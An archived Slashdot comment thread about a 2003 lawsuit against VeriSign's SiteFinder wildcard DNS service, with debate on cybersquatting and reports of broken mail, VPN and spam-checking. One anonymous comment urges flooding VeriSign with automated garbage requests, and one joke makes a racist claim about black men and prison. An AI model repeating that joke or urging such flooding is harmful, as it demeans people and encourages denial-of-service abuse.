VeriSign Sued Over SiteFinder Service

dmehus writes "It was only a matter of time, the pundits said, and they were right. Popular Enterprises, LLC., an Orlando, Florida based cybersquatting so-called 'search services' company, has filed a lawsuit in Orlando federal court against VeriSign, Inc. over VeriSign's controversial SiteFinder 'service.' While PopularEnterprises has had a dodgy history of buying up thousands of expired domain names and redirecting them to its Netster.com commercial "search services" site, the lawsuit is most likely a good thing, as it provides one more avenue to pursue in getting VeriSign to terminate SiteFinder. According to the lawsuit, the company contends alleges antitrust violations, unfair competition and violations of the Deceptive and Unfair Trade Practices Act. It asks the court to order VeriSign to put a halt to the service. VeriSign spokesperson Brian O'Shaughnessy said the company has not yet seen the lawsuit and that it doesn't comment on pending litigation."

I've never understood

[Dancin_Santa]

What's wrong with cybersquatting? How is it different from the pioneers getting 40 acres and a mule?

Re:I've never understood

[bersl2]

Because sometimes that "land" has been previously owned, and the rights to it expired (not always intentionally).

There's nothing wrong about cybersquatting, but it's Just Not Right(TM).

Re:I've never understood

[JayBlalock]

Well, the term has gotten expanded to mean pretty much "owning a domain you don't use." But originally it referred to people who would, say, buy the rights to a celebrity's name .com, and then extort them into paying lots of money to get the rights to it. This ended once the first trademark-infringement case went to court. However, the general term stuck around and is now (IMHO) generally way over-used.

Re:I've never understood

[marphod]

How is it different from the pioneers getting 40 acres and a mule?

First, a history lesson. '40 Acres and a Mule' wasn't a pioneer issue. What it is true that during the western rushes, various federal lands were put up for auction or claim by pioneers. The lands were not, however, specified to be 40 acres, but varied in size based on the territory and the specific land grant. For that matter, according to one of my HS Social Studies teachers (a dozen years ago), there were still federal lands for claim in parts of Alaska. That teacher was known to embellish the truth, so I won't put any varacity statement with that.

'40 acres and a mule' were reparations for slaves in the south. They were instituted by a Northern (Union) general, during the aftermath of the civil war, and were later reveresed by an presidential executive order.

So, in short, your parellel falls a little short. If the ICANN were to pass a ruling granting johnny-come-latelies names from vast corporate pools, that would be comprable.

So, what's wrong with cybersquatting: Well, with the federal land grants, if you occupied and developed the federal lands for a specified period of time, they became yours. You could sell or otherwise use them as you wished. Here, cybersqquatters either are taking a developed item (debatably property) and using its good will and value for an interest contrary to the orginal owners. Which would be a violation of the land grants, so thats one point where your analogy fails.

The other type of cybersquatter (who speculates on names or misspellings) is also abusing the good will of the originator, but may be a valid comparison. It is, however, annoying, to get redirected away from what you wanted because of a typo, and from the other side, a squatter who is taking an otherwise useful resource and making it near-useless is neither providing a valid service or generating good will.

Re:I've never understood

Well, t'term has gotten expandedt'mean pretty much "ownin' a domain you don't use." But originally it referredt'people who would, say, buy t'starboardst'a celebrity's name .com, and then extort them into payin' lotso'doubloonst'get t'starboardst'it. This ended once t'first trademark-infrin'ement case wentt'court. However, t'general term stuck around and be now (IMHO) generally way over-used.

Arrrrrr!

VeriSign be a bunch of land-lubbin' butt pirates, mateys!

Re:Arrrrrr!

Aye, I do believe you be correct, me bucko.

Talk like a pirate day

Re:Arrrrrr!

[Telumehtar]

Here be a related User Friendly cartoon, shipmates!

Re:Arrrrrr!

So a pirate walks into a bar with a steering wheel attached to his crotch. After a couple of drinks the bartender can't take it anymore and says to the pirate "Hey, do you know you have a steering wheel attached to your crotch?" Pirate says, "ARRR! It's driving me nuts!"

^^^^^^^ FUNNIEST JOKE EVER.

Nice tactic.

[NightSpots]

Anti-trust was one of the very few tactics I didn't hear discussed as possible ways to stop Verisign.

Arguing that they get for free what other companies must pay for is probably one of the easier arguments for win, since it proves itself nearly by definition.

I applaud the jackass who pays to abuse typos. At least they've finally proven their worth.

Re:Nice tactic.

[nocomment]

Don't forget the petition!!! Go sign it.

http://www.petitiononline.com/icanndns/

Re:Nice tactic.

It just passed 10,000 signatures

Re:Nice tactic.

10,000? Wow! That's even more than the million man march!

Of course, they had a good excuse --- there aren't a million black men outside of prison. What's the geek community excuse?

Re:Nice tactic.

[bill_mcgonigle]

Anti-trust was one of the very few tactics I didn't hear discussed as possible ways to stop Verisign.

You've probably been listening to 'experts'. You should be listening to Slashdotters instead. Maybe Popular Enterprises does. :)

what the fuck?

[u-238]

just a few minutes ago i was reading a forum and someine directed me to " http://www.ananitech.com/ "

i loaded it up, and it eventually brought up the new site finder, and said "did you mean" and gave me a list (with google spell checking accuracy) of sites that it could have been. sure enough, it linked me to anandtech.com, which is what the person was refering to.

and the writer or this article states that"the lawsuit is most likely a good thing, as it provides one more avenue to pursue in getting VeriSign to terminate SiteFinder"

What the fuck are you talking about?

would you rather be refered to a list of similar sites who might be the one you meant, or fucking nester.com ???

what the fuck is wrong with you?

Re:what the fuck?

you did notice that the link you click is actually not a link to the site, right? It goes through some javascript and then redirects you.

I don't like that shit, I don't trust Verisign.

Re:what the fuck?

[SpookyFish]

Even worse user data than an AC, and I'm not a troll feeder... but he's on the spot, language or no.

Verisign has the rights.. that decision has been made, and can be addressed in other venues if there is a desire. So, they are getting some ad bucks off making less-savvy and too-fast-typing people -- *BUT* ultimately directing them in the right place.

GOOD FOR THEM. You (and I) know we wish we'd thought of it and had the position to use it.

Don't like it, don't agree with it, but acknowledge their right to use the service they faught for and won. If you can't take it, fight the fight to give them (better) competition, instead of filing some frivolous lawsuit.

MOD IT UP.

Re:what the fuck?

[IHateUniqueNicks]

Where have you been? Have you noticed the fact that it's important to be able to tell when a site doesn't exist? That this crap means typos can cripple most e-mail servers? That it invalidates a good section of the RFCs the Internet itself was based on???

Wake up. If you want to find a site, you use Google. If you want to go to a non-existant one, you should damn well be told there's nothing there.

Re:what the fuck?

[Spl0it]

They're abusing a system, and exploiting the power that they were given. Thats hardly a good idea, thats like...

a gas station setting up pilons and signs on the road that FORCE every person off the road int he right lane if they didn't 'see' it intime to go into the gas station... BS BS BS Mod it up, and whoever said Re:what the fuck? (Score:3, Funny) by SpookyFish (195418) Should be removed from moderation!!!

-Spl0it

Re:what the fuck?

[SpookyFish]

Fair enough, good point. I didn't think about the impact it would have on caches and other software that relies on proper HTTP responses (or lack thereof).

So, I amend that to -- If they can send a response header that is RFC compliant, but happen to display a page through some loophole (likely in the favorite *ahem* IE), then they can go for it.

Actually, I don't really care that much either way. I can probably hit stop and search it on google or click a bookmark before their page comes up anyway. It's my non-geek friends and parents I am considering.

Re:what the fuck?

[shostiru]

Netsol (now verislime) was chosen to administer the .com and .net gTLDs in the public interest, not to use them as their private playground.

Let me put it this way ... let's say the state hires you to be the caretaker of a museum (originally paid for by taxpayers!) and tells you that you can make money on the side from the gift shop. Instead, you decide to knock down a bunch of walls and turn the majority of the building into a bar for your private profit. Don't you think people might become a bit pissed off?

Re:what the fuck?

[holt]

It has nothing to do with HTTP responses. This is DNS we're talking about, which operates on an entirely different level of importance, because it affects so much more than just the web.

Re:what the fuck?

>What the fuck are you talking about?

Dunno, what are you rambling on about?

>would you rather be refered to a list of similar sites who might be the one you meant, or fucking nester.com ???

Neither.

>what the fuck is wrong with you?

When I try to go somewhere that doesn't exist, I like to be told that.

Instead, it's like me trying to find Cartoonland, USA and constantly finding myself in Hollywood instead. It's infuriating, annoying, and, in general, lessing my enjoyment (and enjoyment for others) of the internet.

I guess that's ok with you. BTW: By presidential decree, Uranium will now be referred to as lead. No, lead will still be lead. We will just forget you exist.

You don't exist. So what the fuck is wrong with YOU? Shouldn't your account be deleted by now?

Re:what the fuck?

[Edgewize]

There's really no excuse for your non-geek friends and parents to not use Google either. I would go so far as to tell them to use Google as their home page. Domain-name-guessing is NEVER as accurate as the "I'm Feeling Lucky" button.

Re:what the fuck?

[nacturation]

Don't like it, don't agree with it, but acknowledge their right to use the service they faught for and won. If you can't take it, fight the fight to give them (better) competition, instead of filing some frivolous lawsuit.

Yes, thank you Ayn Rand. And how do you give them competition? Ask them to relinquish control of their root servers and institute yours in their place? Or maybe start a whole new internet? Yeah, that's going to work.

Let's face it. Verisign broke the rules (ie: RFCs) which were designed to govern how the internet infrastructure works. Rules which they implicitly agreed to in attaining their position of power.

However, perhaps you're right. They 'fought' for their position, so anything is within their rights. Why, if they suddenly decided to randomly redirect people's existing websites to a Verisign information page, I guess that's ok. After all, one can always fight to give them better competition by creating one's own separate internet.

Re:what the fuck?

You are missing the whole reason everyone is so upset. Verisign DOESN'T HAVE the rights. They DO NOT OWN the .com or .net domains. They have entered an agreement with ICANN where they are the designated people who ADMINISTER the domains. They are being financially compensated to provide a service related to .com and .net; this does not mean they own them!!

Think about this distinction. If you'd like an analogy, think of mutual funds. Mutual funds are owned by shareholders; however, they pay a fund administrator to manage them. The administrator has the power to make all kinds of changes, but this does NOT mean he owns the mutual fund! If the administrator decided he was going to manipulate the direction of the mutual fund to maximize his own personal income instead of the fund's income, he'd be taken down faster than you can say "Martha Stewart".

Re:what the fuck?

[MrMickS]

Don't like it, don't agree with it, but acknowledge their right to use the service they faught for and won. If you can't take it, fight the fight to give them (better) competition, instead of filing some frivolous lawsuit.

What rights did VeriSign fight for here? They *bought* Network Solutions Inc. who managed have managed the .com and .net namespaces since time began (well almost ;)). They don't have a *right* to the contents of the namespace, there are many other registrars that can delegate domains into it. They only have control for historical reasons and the fact that no one could be bothered to change things.

The .uk the TLDs are run by Nominet, a not-for-profit organisation that allows anyone to register as a registrar. They manage the .uk namespace but have no commerical interest in it. Given that VeriSign have now demonstrated that they can't be trusted not to take advantage of their position for commerical gain a similar organisation to Nominet should be setup to manage the .com and ..net domains.

Re:what the fuck?

[godders]

your BROWSER should do that, or possibly a proxy.. not the fucking DNS system. But now they've broken that functionality, as *all* domains now exist. What the fuck is wrong with *YOU*?

Re:what the fuck?

[Des+Herriott]

What about traffic that has nothing to do with HTTP?

Here's a clue for you: Web != Internet.

Re:what the fuck?

[0x0d0a]

Aside from that, folks occasionally actually use apps other than web browsers.

Re:what the fuck?

you're telling me! Never name your business Goats ECX!

Re:what the fuck?

[MadAhab]

Right on. They've decided that since they can make money on HTTP typosquatting, they have the right to fuck up the rest of the internet as well. Fucking fuckers they are.

If they really have the right to do this, what's next? E-mail harvesting! Accept mail for bogus domains, but return "No such user" for all of them, collect the "Mail from:" addresses, and send them lots of spam! What, their MTA didn't read the "Terms of use" in the banner displayed on connect?

Frankly, this reallly goes over the line. They cannot be trusted with a core internet technology any longer. Netsol/Verisign still manages to constantly whipsaw between extreme greed, incompetence, arrogance, and foolishness, and I no longer care which one is predominant. Fire their asses now!

Re:what the fuck?

[u-238]

domain goes to netster, or domain goes to a helpful site finder.

WHAT THE FUCK IS SO HARD TO UNDERSTAND ABOUT THAT

Re:what the fuck?

[godders]

the domain can *still* go to netster. Remember if netster want to catch people, they need to actually register the domains (and be responsible for whatever legal implications that may have). this way, verisign are getting a shitload of traffic, for free, bypassing the legal problems, and breaking functionality of the dns system. Look at it from a user's point of view, if you hit a typo domain, you might want some kinda page that offers you google style spelling correction in your browser.. but do you want a similar thing in your mail system? ... The point is that it's simple enough to provide the functionality you seem to think is so great in the web browser (in fact MS have already done so).. so why break the dns system if it's not purely an attempt to make money?

SWAT comes back to mind ...

[dzym]

one hundred meeeellion dollahs!

Re:SWAT comes back to mind ...

[bahamat]

If you're going to quote pop culture, do it right.

Dr. Evil quite prominently pronounced his "R"s

Re:SWAT comes back to mind ...

[Red+Warrior]

Dr. Evil was in SWAT? I missed that part of the movie...

Re:SWAT comes back to mind ...

if you're going to complain about other people's movie lines, at least know which movie they're talking about.

Pert Peeve

[QuantumSpritz]

Cybersquatting, though one of the great minor evils of the web, is damned hard to stop. I can't think of any way to regulate/legislate it without messing up the domain registration and transfer process for everyone else - though it would be nice to be able to buy domains BACK from these companies - I would imagine quie a few choice domains are in their hands. Nice to see a lawsuit taking on Verisign over this - even if it is a cybersquatter. I wonder if there's an intelligent way to reserve domain names for individuals and organizations which already have use for the name - maybe a form of 'prior branding' only better implemented...

Re:Pert Peeve

To get a domain.com.au address, the "domain" part has to have something to do with your registered company name, at least it did last time I checked. It seems to work well, IMHO.

Re:Pert Peeve

[Malcontent]

"though one of the great minor evils of the web"

A great minor evil. That's a new one on me.

Re:Pert Peeve

[kubrick]

That requirement has been relaxed lately; they're pretty loose about it now, and auDA just require that it be 'related to your business operations'. Not quite the free-for-all that .com/.net/.org is...

Re:Pert Peeve

[PhB95]

That's sh*t ! To get a .fr it's the same. Now as a french citizen I may get www.myname.com (in fact no because it's already owned by some N.Y. law firm) or at least I had a chance to get it. But I can't get www.myname.fr, which my wonderful country reserves for corporations only : If you ain't making money, internet is not for you. And then they say americans are greedy!

Re:Pert Peeve

[gid]

My idea has always been to devalue .com .net and .org as TLDs. Introduce even more TLDs, increasing the name space. How about a .oss, made for only open source projects only. A .club for certain clubs or whatever else you can think of that makes sense. The problem is getting a TLD added, Verisign sure as fuck doesn't want to devalue com/net/org, I can guarantee you that. Who's in charge of TLDs anyway? ICann?

Also.... don't allow automatic registration, wait for this domain to become availabe and other dumb junk that only helps cybersquatters.

Re:Pert Peeve

[Snoopy77]

A great minor evil. That's a new one on me.

Yeah, it's quasi-evil but it's about the best damn quasi-evil of the web.

Re:Pert Peeve

[The+Revolutionary]

There's really nothing incorrect about that statement.

It is not, (great, minor) evil. It is great (minor evil). It's similar to how we might say, "a large category 2 hurricane". That is, "for a category 2 hurricane, it is large."

"For a minor evil, it is great".

Similarly, there is nothing wrong with "vast minority of the group". Here what we reference is, for example, "the most significant or numerous part of that subgroup constituting the minority".

While you are modded funny, I still do not hesitate to reply, as I've encountered many who are quite serious about it, many wannabe grammar-nazis. If you what to be a grammar nazi, or whatever, if you want to hold a grudge or a pet peeve, why don't you start by at least thinking the matter through?

Did that occur to you? It's really quite easy to understand what is referenced by phrases of that sort.

Did it occur to you to think?

No, I didn't think so. Now crawl back into your cave.

Re:Pert Peeve

[salesgeek]

Cybersquatting, though one of the great minor evils of the web, is damned hard to stop.

I am not a squatter. That said, I don't see where there is a problem with it. Domains are the internet's equivelent of real estate addresses:

* Speculators will invest in and lease the best addresses.
* If you don't renew your lease, someone else can and likely will.

Re:Pert Peeve

Shut the fuck up you pedant.

Re:Pert Peeve

[notb4dinner]

Not exactly. *.com.au is intended to be used by commercial entities, so restricting it in this way makes sense. Non-commercial entities are free to register *.net.au, *.org.au etc etc. In fact *.id.au is also available especially for individuals.

Re:Pert Peeve

[Horny+Smurf]

so instead of just registering slshdot.org, netster has to file a dba slshdot.org. Or form a wholly owned subsidiary, slshdot LLC. All that does is make it a pain for mom and pop stores and individuals.

Re:Pert Peeve

[Broodje]

I enjoyed your post up until I got to this: "No, I didn't think so. Now crawl back into your cave."

Maybe split your comment into two posts, so I can mod the upper half +1 informative, and the lower half troll/asshat.
It's friday.

Re:Pert Peeve

[schon]

A great minor evil. That's a new one on me.

Not really - it's less than 21 years old, so it would still (legally) be considered a minor :o)

Re:Pert Peeve

[Xerithane]

Not really - it's less than 21 years old, so it would still (legally) be considered a minor :o)

There goes Slashdot being US-centric again. You insensitive clod.

The pool

[r_glen]

OK guys, who had 3-5 days??

Re:The pool

[panaceaa]

I did. Pay up, dorkwad.

Re:The pool

OK guys, who had 3-5 days??

Hmm, I must have been in another pool, I won with 25k seconds.

"Unfair advantage"?

[tessaiga]

According to the lawsuit, Mountain View, California-based VeriSign has been using its position as the keeper of the master list of all Web addresses ending in ".com" and ".net," also called domain names, to unfair advantage.

So Popular Enterprises' complaint is not that VeriSign is cybersquatting, but that they're doing it more effectively without letting others have a slice of the pie?

I guess people will figure that the end justifies the means, but the argument still seems a little distasteful.

Re:"Unfair advantage"?

[sillypixie]

• So Popular Enterprises' complaint is not that VeriSign is cybersquatting, but that they're doing it more effectively without letting others have a slice of the pie?

No, I think their complaint is that Verisign is in charge of baking the pies in the first place... it's hard to develop market share for your product, if users are diverted upstream.

Re:"Unfair advantage"?

[Caled]

Verisign has just acquired more domain names than there are atoms in the universe. If Mountain View wanted them they'd have to pay more money than exists, whereas it only cost versign a line in their DNS records.

This is clearly abuse of monopoly.

Re:"Unfair advantage"?

[digital+bath]

You know, I wouldn't really have THAT much of a problem if verisign at least served up the page with a 404 status error in the header. However, their sitefinder gives out the normal "200: ok" status on bad domains, which seems to me like a serious problem - I can see this breaking existing apps.

Re:"Unfair advantage"?

[tessaiga]

Verisign has just acquired more domain names than there are atoms in the universe. If Mountain View wanted them they'd have to pay more money than exists, whereas it only cost versign a line in their DNS records.

Exactly. Most Slashdotters (myself included) are objecting to the fact that Verisign has essentially hijacked all unused domains. However, Mountain View's objection is that doing the same would cost them money, while it's free for Verisign. The action itself doesn't bother them; it's the uneven costs of doing so that has them annoyed.

Or, put another way, Mountain View would be perfectly satisfied if the result of the lawsuit was that Verisign allowed other cybersquatters to grab mistyped domains for free also, creating a huge happy cybersquatting family. Somehow I don't think the rest of us would be quite as delighted though.

Re:"Unfair advantage"?

[HeadDown]

There's more to a domain than just a website, you know. An nslookup -type=NS bogusdomain.com is going to return sitefinders data whether the corresponding website returns 404 or not, while it's supposed to return NXDOMAIN. Spam-checking tools that verify the senders address use this; they don't go checking the website, which would be very unreliable to boot. Not every domain must have a website, and even if it does, it could be at http://bogusdomain.com, http://www.bogusdomain.com, http://web.bogusdomain.com, https://secure.bogusdomain.com, etc.

Re:"Unfair advantage"?

Would you say this is fair?

Re:"Unfair advantage"?

[bernywork]

This actually causes LARGE problems for people operating over VPN connections.

What normally happens is this:

People do a request for a site, e.g. intranet.internal.foo.org.

The external DNS servers fail in that they don't come back with an answer, and then the client continues through its list of DNS servers until it gets to the internal servers where it gets an answer.

What's happening now is that they ARE getting a good answer from the external servers, and the client is trying to connect to the 64.x.x.x address of Sitesearch. Now in most organisations the client isn't able to connect to that box (because its firewalled or whatever else), so it isn't a problem for VeriSign, however, it is a problem for the organisation, as the clients who are trying to work are getting given IP addresses for internal servers that are incorrect.

I have had to change dial up settings on a few clients and change others over to using static IPs at the moment until a better solution comes around. Or even better till VeriSign stop doing this.

Berny

Re:"Unfair advantage"?

[shanen]

This is completely sideways. So far all the comments seem to be completely missing the forest to stare at an ugly leaf.

What Mountain View is doing is completely unethical and they should already be out of business. The entire foundation of their business is to exploit human confusion for profit.

What Verisign is doing is not intrinsically evil. The DNS system is intended to reduce confusion, and it is reasonable that the DNS system SHOULD respond intelligently to help confused users. The relatively minor problem here is that Verisign is trying to do a good thing in a way that maximizes their profitability and exploits their position at the top of the mountain. The side effect of putting scammers like Mountain View out of business would be a GOOD thing.

Cheering for Mountain View is like wanting an experienced hit man to "take care" of your troublesome neighbor. (However, I do agree that Verisign is going out of bounds, but Microsoft has been doing worse things for much longer.)

Re:"Unfair advantage"?

[todd1000]

Here's what I sent to ICANN: I would like to know who gave Verisign the right to have all of the unpaid for domain name space to place their advertisements. I work for a company who supports two large accredited domain registrars and neither they, nor we get this opportunity. If Verisign is going to do this, in all fairness, the DNS mapping should be shared, so that we can all have a piece of the free ads. Maybe we can get all the mispelt addresses starting with 'c'? This appears to be flagrant abuse of the DNS and the domain registration system. Maybe it's time that some uncorrupt people take over the domain system for the Internet. This will also mess up a simple, yet effective control for some spam. If an address doesn't map to an IP, it would be rejected. I guess now, we'll all have to completely blackhole that IP address on mail systems and routers. Please do something about this abuse of power. It's time to implement a fairer system, not the silly monopolistic and corrupt one we have now.

Re:"Unfair advantage"?

However, Mountain View's objection is that doing ... Or, put another way, Mountain View would be perfectly satisfied if

Umm ... guys ... I know it is late but you need to reparse the sentence. Mountain View is the California city in which Verisign is based. The litigant is Popular Enterprises, LLC.

--
Concerned about your network security? Try the free Nmap Security Scanner

Re:"Unfair advantage"?

Mmmmm pies.

Re:"Unfair advantage"?

[nocomment]

Don't forget printers. At my work we had a network printer that stopped working. What was happening was that there was an attempted name resolution at the beginning of the print job, when that failed it went with the known IP address. Now that the name resolution always resolves, those print requests went out to the internet. Fixed with a simple block on the firewall.

Re:"Unfair advantage"?

This actually causes LARGE problems for people operating over VPN connections.

People do a request for a site, e.g. intranet.internal.foo.org.

The external DNS servers fail in that they don't come back with an answer, and then the client continues through its list of DNS servers until it gets to the internal servers where it gets an answer.

If this is the way your VPN systems are set up, then they are set up wrong! The setup you have never was secure or safe because someone could've registered the domains you're hoping won't exist anyway.

The correct way to do this is to use a search order. That's why /etc/resolv.conf has a search directive. You put something like

search internal.foo.org foo.org

and then when you look up "intranet", it will first try "intranet.internal.foo.org.", then "intranet.foo.org.", and THEN stuff that exists in the outside world.

Of course, not all operating systems have /etc/resolv.conf, but if they don't have something equally good, then they're broken and insecure...

Re:"Unfair advantage"?

The setup you have never was secure or safe because someone could've registered the domains you're hoping won't exist anyway.

Er... if Foo Inc. owns foo.org, it's kindof hard for someone to register evilhost.foo.org if they don't have access to Foo Inc's DNS servers.

Now, maybe it can be spoofed in some way, I don't know.

Re:"Unfair advantage"?

[PowerPill]

That's exactly what I was beginning to think but it all depends.

IE Verisign could "round robin" the sitefind service for a fee to other squatters. It could actually turn out to be cheaper than waiting for expiry dates or grabbing up mispelled domains by the other players. Essentially cutting the overall overhead for other squatter co's to make it more attractive and join in the domain orgy.

But that won't make too much sense. Why the hell would verisign do that? They make money off of the registrations in the first place.

So here's what they do. One could charge varying rates on typo'd domains that "resemble" more popular "real" domains. Less for more obscure ones. Not much unlike banner ad revenue on popular sites VS less popular sites. Basically the same maketing scheme but inverted. The overhead of research and actually going through the motions of registering would be cut out of the picture so the co's will still save money if verisign did something as morally asinine as this.

Anyway, it could be done. The semantics of how you'd arrive at the costs is something I'll let others wrap their heads around.

Unless there's a gaping hole that I've missed, I find this more than a little disturbing don't you?

Re:"Unfair advantage"?

[Phroggy]

Verisign has just acquired more domain names than there are atoms in the universe. If Mountain View wanted them they'd have to pay more money than exists, whereas it only cost versign a line in their DNS records.

Actually it's less than that. I believe there are 37 possible characters (letters, numbers, hyphen) and length must be between 1 and 63. Multiply that by two TLDs. So that's a maximum of 12871757084838317190619237434832975247557480597538 37041862618498070630852038814649441492983666689918 domains, however a few combinations are reserved (anything where the third and fourth characters are hyphens, for example) - some of these are reserved for domains encoded from a foreign character set (such as Japanese), I think the ones starting with bq-- or something like that. Of course the domains that are already registered don't really count.

#!/usr/bin/perl

use Math::BigInt;
my $total=Math::BigInt->new('0');
my $charset=Math::BigInt->new('37');
for($x=1;$x<64; $x++) {
$total+=$charset**$x;
}
print $total*2,"\n";

Re:"Unfair advantage"?

[FireFury03]

Actually, if foo.com is registered and the authoratative servers say that internal.foo.com doesn't exist then lookups for internal.foo.com will still fail correctly, even with the horrible SiteFinder junk. The problem of course is if they use somefakedomain.com for their internal network (which is completely wrong anyway) then that will break... But then that would break if someone decided to register somefakedomain.com anyway.

Don't get me wrong - the SiteFinder "service" is wrong, needs to be shut down and causes problems.

Re:"Unfair advantage"?

[PowerPill]

"The DNS system is intended to reduce confusion, and it is reasonable that the DNS system SHOULD respond intelligently to help confused users."

Hmm yes and no. It is there to reduce forgetfulness and not confusion.

It's easier to remember http://slashdot.org rather than http://66.35.250.150. A name server is really a data base. It's what you do with the data after it's been pulled.

I'm quite positive that any intellegent response should be handled on the client side after gathering what it can from the server side. IE did this on it's own by defualt. Verisign however is literally not giving anyone a choice in the matter. That's where the morallity comes in.

I'm picking up what you're throwing down but I just can't sympathize.

"(However, I do agree that Verisign is going out of bounds, but Microsoft has been doing worse things for much longer.)"

And maybe M$ has been doing it for longer, but at least we have a choice by not using any M$ products whenever possible. =)

Re:"Unfair advantage"?

[grahamm]

Sending back an NXDOMAIN response is, IMHO, a much more intelligent and appropriate response than diverting to a un-requested web site.

Re:"Unfair advantage"?

[Nakarti]

It already has broken some *web sites*
Has anyone tried to access resellerratings.com lately? If verisign broke my site that badly, I would sue for it!
(Hint- verisign brings up invalid DN's to R'R'.com and resellerratings.com's links and images are all broken.)

Re:"Unfair advantage"?

[questor]

It's not the place for DNS *servers* to "help confused users"; DNS *clients* would be the place for that kind of thing. (Not that I think IE's redirection to MicroSoft's search is appropriate either, but that's not really part of this discussion.)

Re:"Unfair advantage"?

[MadAhab]

Consider what happens when you try to send email to a non-existent domain by mistake. Consider what happens when you try to check the validity of an email address by looking it up. Consider what happens when you are doing ANYTHING but using a web browser. They are causing more confusion than they are "assisting" by a factor of about 100000000000000000000.

They can go fuck themselves and you can go with them.

Re:"Unfair advantage"?

[scrytch]

You should know, that DNS trick is a wretchedly bad idea security-wise. DNS can be hijacked, poisoned, etc. The whole point of a VPN is that you don't trust the general internet. Hell, it just takes a negative cache entry to defeat fall-through name resolution (on windows anyway, one reason I kept having to 'net stop "dns client"' until I got wise and disabled it entirely).

Plus, verisign does it for nonexistent second-level domains. If foo.com exists, badhostname.foo.com will still fail to resolve. Not to diminish verisign's overall badness, but it's hardly that bad...

Re:"Unfair advantage"?

[Rich0]

Uh - I run my own DNS at home, and I wouldn't do it this way. Why not just run your own TLD - have your clients point to abc.foo instead of abc.foo.com. Then the DNS queries wouldn't even make it to Verizon in the first place.

At home I run a .local domain - works just fine.

Re:"Unfair advantage"?

This actually causes LARGE problems for people operating over VPN connections.

If you're running a faked internal DNS zone, you simply create an authorative forward zone in your internal DNS server. Where's the problem in that?

Re:"Unfair advantage"?

[miratim]

Yeah, seriously. My company has several telecommuters who woke up that day to find that their normal, relative DNS lookups to internal servers (like our CVS server) were being redirected to sitefinder. But of course, the applications didn't know that, and so they reported that the server wasn't responding on the specified port.

Re:"Unfair advantage"?

[Trepalium]

It's worse than that. Some RFCs state that you should attempt to deliver mail to the A record host if the MX records do not exist. This move by Verisign has increased the amount of traffic required to bounce a message, with possible retries, etc. Now your mail server has to start an entire SMTP connection to Verisign, and be told that the domain doesn't exist with a fatal SMTP error. Before, you'd get a single UDP packet and be done.

Re:"Unfair advantage"?

[bernywork]

Unfortunately I am talking about Windows boxes, and not Linux. If it was linux then I could have configured it to work like this from day .

Re:"Unfair advantage"?

[bernywork]

Unfortunately welcome to Windows. Windows always checks its other DNS servers first before it checks ones from VPNs.

Our only real option would be to put int. in the external DNS with NS records pointing to invalid addresses.

Re:"Unfair advantage"?

[JamieF]

Do you mean if I poison your DNS server with a fake FQDN of "intranet.internal" that I can start harvesting passwords from your VPN users, as they log into my faked-up copy of your intranet server? Can you say "man in the middle attack"? Only when your help desk gets a flood of calls asking why the intranet server doesn't seem to have the right info on it will you know that something is amiss.

Actually, I don't think that if a user searches for (intentional typo:) intarnet.intrenal.foo.org, and there is an authoritative source for foo.org, that Verisign can even hijack that. It'll go to your server for foo.org where it will fail. Only if people are looking servers up by "intranet.internal' and relying on domain search paths to be set properly will Verisign get to intercept it. And for that matter, any sec^H^H^Hobscurity you got from not publishing that DNS entry is diminished since DNS queries for "intranet.internal" will be sent across the internet every time somebody does that. And it's slower to wait for it to fail than to just do the FQDN search. And if you use SSL the browser will bitch anyway because the cert was signed for "intranet.internal.foo.org", not "intranet.internal".

Am I not understanding something about your setup, or Windows, or something sneaky Verisign is doing? It sounds like the problem you described is more a problem with your DNS setup than with anything Verisign is doing.

They screwed up resellerratings.com

[melted]

Even though the site is perfectly fine, I CAN'T access it without hitting their stupid "finder" for some reason.

Most ISPs have blocked it

[Amsterdam+Vallon]

*Confirmed*: Adelphia has blocked VeriSign's new "service."

Please reply to this and list names of fellow anti-VeriSign ISPs if your ISP has blocked this new "feature" as well.

Thanks! I will enjoy analyzing this data.

Re:Most ISPs have blocked it

[shostiru]

We (mid-sized midwestern ISP) had our main nameservers (tinydns and djbdns) patched by 2AM the night this mess started, using the patches we found here. By a few hours later, I'd kludged the BIND source myself on a couple of other machines to return NXDOMAIN for anything in all three of the /24 netblocks in AS30060 (it worked fine, at least until the ISC patch was released). AFAIK our customers never even noticed the wildcarding.

If you work in an ISP or other network infrastructure company, you know first-hand the degree of astonishment and rage that Verisign's move elicited; the fallout (spam filtration, security, network monitoring, etc.) goes far beyond HTTP. I don't think any of us slept much that night ... it only took a few hours to restore normal DNS behaviour, the remaining ten or so I spent in shock with my jaw scraping the floor.

I've dealt with Verisign before (try getting decent documentation on the cybercash application library!) and knew they were greedy and stupid, but I wasn't counting on raw, unfettered eeeeeevil.

Re:Most ISPs have blocked it

two more on this side of the pond. Portugal's largest dial and ADSL ISPs have both patched their DNS resolvers to block this.

Re:Most ISPs have blocked it

[jms]

Speakeasy appears to have blocked the "feature".

Re:Most ISPs have blocked it

[aliquis]

I tried this for the first time ever, the resulting SiteFinder webpage seems quite useful and looks clean, but sure, I don't want to be tranfered to some site i wasn't looking for then i acidently type the wrong thing (a la microsoft internet explorer).
Anyway, it seems it's NOT blocked with bredbandbolaget, the swedish 10mbps isp. I've sent the technical support an email and asked them if they are thinking about it thought, we'll see what they answer.

Re:Most ISPs have blocked it

How long before we realize that all we have to do is send automated garbage requests.
A single request from your server and multiple Verisign resource (hard at work) only for you!

Who knows, maybe they are trying to log this to some database. ANALYZE THIS!

Re:Most ISPs have blocked it

[Dominic_Mazzoni]

It's blocked for me. The cable is provided by Time Warner, but the Internet connection by RoadRunner, so I'm assuming that RoadRunner is the one blocking it...

Re:Most ISPs have blocked it

Please reply to this and list names of fellow anti-VeriSign ISPs if your ISP has blocked this new "feature" as well.

Thanks! I will enjoy analyzing this data.

And I thought I needed to get laid...

Re:Most ISPs have blocked it

[Xenoproctologist]

To be more specific, Adelphia has blocked the IP of the Shitefinder website. They haven't patched their DNS servers to return NXDOMAIN on *.TLD.

Re:Most ISPs have blocked it

[MattCohn.com]

Comcast has also not blocked this.

Re:Most ISPs have blocked it

Vector Internet Services Incorporated is currently testing their anti-SiteFinder solution before rolling it into production. It's been on the cooker since about 0600 UTC on Wednesday.

Mike Horwath, senior admin, called Verisign's actions "offensive". Concise, yet very descriptive. :-)

Re:Most ISPs have blocked it

SBC DSL hasn't block this. I tried it with:

www.anindtech.com

from one of the posts above.

Re:Most ISPs have blocked it

[jkc120]

If enough of us request this here, perhaps their online techs will spread the word to SBC NOC/management to do so.

Re:Most ISPs have blocked it

[Enigma+Deadsouls]

the remaining ten or so I spent in shock with my jaw scraping the floor.

